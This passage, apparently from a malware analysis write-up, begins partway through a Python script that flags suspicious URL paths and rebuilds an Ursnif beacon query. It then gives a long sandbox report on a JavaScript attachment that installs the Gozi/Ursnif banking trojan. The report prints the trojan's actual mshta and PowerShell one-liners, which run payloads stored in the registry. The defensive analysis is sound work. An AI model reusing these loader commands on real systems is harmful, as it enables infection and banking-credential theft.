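    ("GET", "/static/css/site.css?v=3"),
    ("GET", "/wp-content/uploads/2020/04/report.pdf"),
]

# Configuration as printed by the report's Malware Configuration Extractor.
EXTRACTED_CONFIG = {
    "server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "242",
    "system": "ecde5b0ce2df094efe45e0bf22cd4877hh", "size": "200777", "crc": "2",
    "action": "00000000", "id": "3000", "time": "1586395395",
    "user": "8a8ed6d154c8a3b79c4b2eb5a02b1ead", "hash": "0x43f98375", "soft": "3",
}


def beacon_query(cfg: dict) -> str:
    """Fill the in-memory format string
    soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    with extracted config values; this is the plaintext the bot encrypts."""
    user = cfg["user"].lower()
    if not re.fullmatch(r"[0-9a-f]{32}", user):
        raise ValueError("user must be four %08x words")
    # %d stands in for C's %u; crc is read as hex to match %x (assumption: the
    # extractor prints it as a bare string without a radix).
    return "soft=%d&version=%d&user=%s&server=%d&id=%d&crc=%x" % (
        int(cfg["soft"]), int(cfg["version"]), user,
        int(cfg["server"]), int(cfg["id"]), int(cfg["crc"], 16))


if __name__ == "__main__":
    for v in scan(SAMPLE_REQUESTS):
        print(v.score, v.reasons, len(v.blob), v.decoded_len, v.target[:40])
    print(beacon_query(EXTRACTED_CONFIG))
```

The score weights favour the _2F/_2B escapes because ordinary web applications never emit that encoding in a path; segment count and length alone would also match long CDN URLs. The recovered bytes are still ciphertext under the campaign key, so decoded_len only tells you how much data each beacon carried, which is itself a useful pivot when several hosts talk to the same directory.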

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000005.00000003.810195397.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.923006439.00000000056B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.968635688.0000000005070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.810012568.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.809504976.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.810318612.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.809358127.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.937070436.000002A0B34C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.838670762.000000000533B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.810276676.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1086943730.000000000037E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.809661520.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.809089457.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 4888, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 1784, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0508FB8F lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, string: \cookie.ff
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0508FB8F lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, string: \cookie.ie
Yara detected Ursnif
Source: Yara match | File source: 00000005.00000003.810195397.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.923006439.00000000056B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.968635688.0000000005070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.810012568.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.809504976.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.810318612.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.809358127.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.937070436.000002A0B34C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.838670762.000000000533B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.810276676.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1086943730.000000000037E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.809661520.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.809089457.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 4888, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 1784, type: MEMORY

System Summary:

barindex
Writes or reads registry keys via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functionsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00401652 NtMapViewOfSection,5_2_00401652
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0040113E GetProcAddress,NtCreateSection,memset
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_00402765 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_050775B3 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05075CD8 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0507476B RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0507668C NtMapViewOfSection
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0508CEA7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlExitUserThread
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05090170 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0508A395 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_050893CD NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0508CA3E GetProcAddress,NtCreateSection,memset
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05088A30 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0508A27A NtQueryInformationProcess
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_050802DF NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05074D66 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0508C7BD NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05087933 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05084968 memset,memcpy,LdrInitializeThunk,NtSetContextThread,RtlNtStatusToDosError,GetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0507A99C NtGetContextThread,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0508B07A NtQuerySystemInformation,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_050873D6 memset,NtQueryInformationProcess
Source: C:\Windows\System32\control.exe | Code function: 18_2_00364AD0 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose
Source: C:\Windows\System32\control.exe | Code function: 18_2_00348AD8 NtSetInformationProcess,CreateRemoteThread
Source: C:\Windows\System32\control.exe | Code function: 18_2_00362DC0 NtQueryInformationProcess
Source: C:\Windows\System32\control.exe | Code function: 18_2_00381000 NtProtectVirtualMemory,NtProtectVirtualMemory
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_050793F0 CreateProcessAsUserA
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_00402544
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_004131AF
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05096D18
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05091D5A
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05091570
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05076F34
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0507CF55
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05082778
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05083F8C
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05092613
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05082EDE
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_050810DE
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0507DB4A
Source: C:\Windows\System32\control.exe | Code function: 18_2_003679AC
Source: C:\Windows\System32\control.exe | Code function: 18_2_00365550
Source: C:\Windows\System32\control.exe | Code function: 18_2_0034682C
Source: C:\Windows\System32\control.exe | Code function: 18_2_0034C850
Source: C:\Windows\System32\control.exe | Code function: 18_2_003558F4
Source: C:\Windows\System32\control.exe | Code function: 18_2_00348128
Source: C:\Windows\System32\control.exe | Code function: 18_2_0034D178
Source: C:\Windows\System32\control.exe | Code function: 18_2_0036F944
Source: C:\Windows\System32\control.exe | Code function: 18_2_0034D9B0
Source: C:\Windows\System32\control.exe | Code function: 18_2_003411A0
Source: C:\Windows\System32\control.exe | Code function: 18_2_003471CC
Source: C:\Windows\System32\control.exe | Code function: 18_2_0036F214
Source: C:\Windows\System32\control.exe | Code function: 18_2_0036AA0C
Source: C:\Windows\System32\control.exe | Code function: 18_2_0034A2B4
Source: C:\Windows\System32\control.exe | Code function: 18_2_00342AB5
Source: C:\Windows\System32\control.exe | Code function: 18_2_0036DA94
Source: C:\Windows\System32\control.exe | Code function: 18_2_00349B34
Source: C:\Windows\System32\control.exe | Code function: 18_2_00352318
Source: C:\Windows\System32\control.exe | Code function: 18_2_00369358
Source: C:\Windows\System32\control.exe | Code function: 18_2_00353B94
Source: C:\Windows\System32\control.exe | Code function: 18_2_0036DB90
Source: C:\Windows\System32\control.exe | Code function: 18_2_0036B3F0
Source: C:\Windows\System32\control.exe | Code function: 18_2_0035F3CC
Source: C:\Windows\System32\control.exe | Code function: 18_2_00366C2C
Source: C:\Windows\System32\control.exe | Code function: 18_2_0034B474
Source: C:\Windows\System32\control.exe | Code function: 18_2_00357C70
Source: C:\Windows\System32\control.exe | Code function: 18_2_0035BC5C
Source: C:\Windows\System32\control.exe | Code function: 18_2_00352C58
Source: C:\Windows\System32\control.exe | Code function: 18_2_0036A520
Source: C:\Windows\System32\control.exe | Code function: 18_2_0036E520
Source: C:\Windows\System32\control.exe | Code function: 18_2_00350D08
Source: C:\Windows\System32\control.exe | Code function: 18_2_0036CD48
Source: C:\Windows\System32\control.exe | Code function: 18_2_0036FE60
Source: C:\Windows\System32\control.exe | Code function: 18_2_00342644
Source: C:\Windows\System32\control.exe | Code function: 18_2_0035CE40
Source: C:\Windows\System32\control.exe | Code function: 18_2_00368E40
Source: C:\Windows\System32\control.exe | Code function: 18_2_00362EBC
Source: C:\Windows\System32\control.exe | Code function: 18_2_0034FE88
Source: C:\Windows\System32\control.exe | Code function: 18_2_00365EFC
Source: C:\Windows\System32\control.exe | Code function: 18_2_0036BECC
Source: C:\Windows\System32\control.exe | Code function: 18_2_0036873C
Source: C:\Windows\System32\control.exe | Code function: 18_2_003707B8
Source: C:\Windows\System32\control.exe | Code function: 18_2_00346F84
Source: C:\Windows\System32\control.exe | Code function: 18_2_0035FFF0
Source: C:\Windows\System32\control.exe | Code function: 18_2_0036DFC4
Dropped file seen in connection with other malware
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\TsCrxrp.txt 9853CB779F41A206FBEDC4F79AE92621F6B9E4234C8E88570CAD9EA97B9435FD
Java / VBScript file with very long strings (likely obfuscated code)
Source: open_attach_p2y.js | Initial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)
Source: TsCrxrp.txt.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Classification label
Source: classification engine | Classification label: mal100.bank.troj.evad.winJS@19/19@4/1
Contains functionality to enum processes or threads
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05086887 CloseHandle,LdrInitializeThunk,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle
Creates files inside the user directory
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\
Creates mutexes
Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{BF22DA4C-12D1-49BD-1463-668D8847FA11}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1464:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{5F80CF80-3252-E90B-3403-862DA8E71AB1}
Creates temporary files
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\zwpCU.yVwpxaM
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Reads ini files
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: open_attach_p2y.js | Virustotal: Detection: 28%
Source: open_attach_p2y.js | ReversingLabs: Detection: 25%
Sample might require command line arguments
Source: regsvr32.exe | String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Spawns processes
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\open_attach_p2y.js'
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\TsCrxrp.txt
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\TsCrxrp.txt
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5076 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5076 CREDAT:82950 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5076 CREDAT:17432 /prefetch:2
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\TsCrxrp.txt
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\TsCrxrp.txt
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5076 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5076 CREDAT:82950 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5076 CREDAT:17432 /prefetch:2
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Reads internet explorer settings
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Submission file is bigger than most known malware samples
Source: open_attach_p2y.js | Static file information: File size 3544719 > 1048576
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll
Binary contains paths to debug symbols
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000013.00000002.1086254761.000000000D160000.00000002.00000001.sdmp
Source: Binary string: c:\exercise\Study\just\month\fraction\shortBorn.pdb | source: wscript.exe, 00000000.00000003.605060543.00000175BB621000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.961453332.000000000041A000.00000002.00020000.sdmp, TsCrxrp.txt.0.dr
Source: Binary string: ntdll.pdb | source: regsvr32.exe, 00000005.00000003.932108622.0000000005E60000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP | source: regsvr32.exe, 00000005.00000003.932108622.0000000005E60000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000013.00000002.1086254761.000000000D160000.00000002.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05086450 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress
PE file contains an invalid checksum
Source: TsCrxrp.txt.0.dr | Static PE information: real checksum: 0x31b79 should be: 0x38b9c
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_004024E0 push ecx; ret 5_2_004024E9
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_00402533 push ecx; ret 5_2_00402543
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_004137BD push ecx; ret 5_2_004137D0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05096D07 push ecx; ret 5_2_05096D17
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_050969A0 push ecx; ret 5_2_050969A9
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0509BA4E push ds; retn 0002h 5_2_0509BA69
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0509BA74 push edx; retn 0002h 5_2_0509BA75
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0509BA98 push edx; ret 5_2_0509BAAD
Source: C:\Windows\System32\control.exe | Code function: 18_2_0035B849 push 3B000001h; retf 18_2_0035B84E
Binary may include packed or encrypted code
Source: initial sample | Static PE information: section name: .text entropy: 6.81480463595

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\TsCrxrp.txt
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\TsCrxrp.txt

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000005.00000003.810195397.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.923006439.00000000056B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.968635688.0000000005070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.810012568.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.809504976.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.810318612.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.809358127.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.937070436.000002A0B34C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.838670762.000000000533B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.810276676.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1086943730.000000000037E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.809661520.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.809089457.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 4888, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 1784, type: MEMORY
Disables application error messages (SetErrorMode)
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: explorer.exe, 00000013.00000000.1010797574.0000000009D8B000.00000004.00000001.sdmp | Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\IBTDGTUVOLOWUIAFTBXTXIFWWSUPNVOVMTHRJQVKDYJRYEFHUTMEPMNEILIRTKKOUTYFRR\CIBDSRGXWTZZPFUZMMIHGHCV.EXEAM+
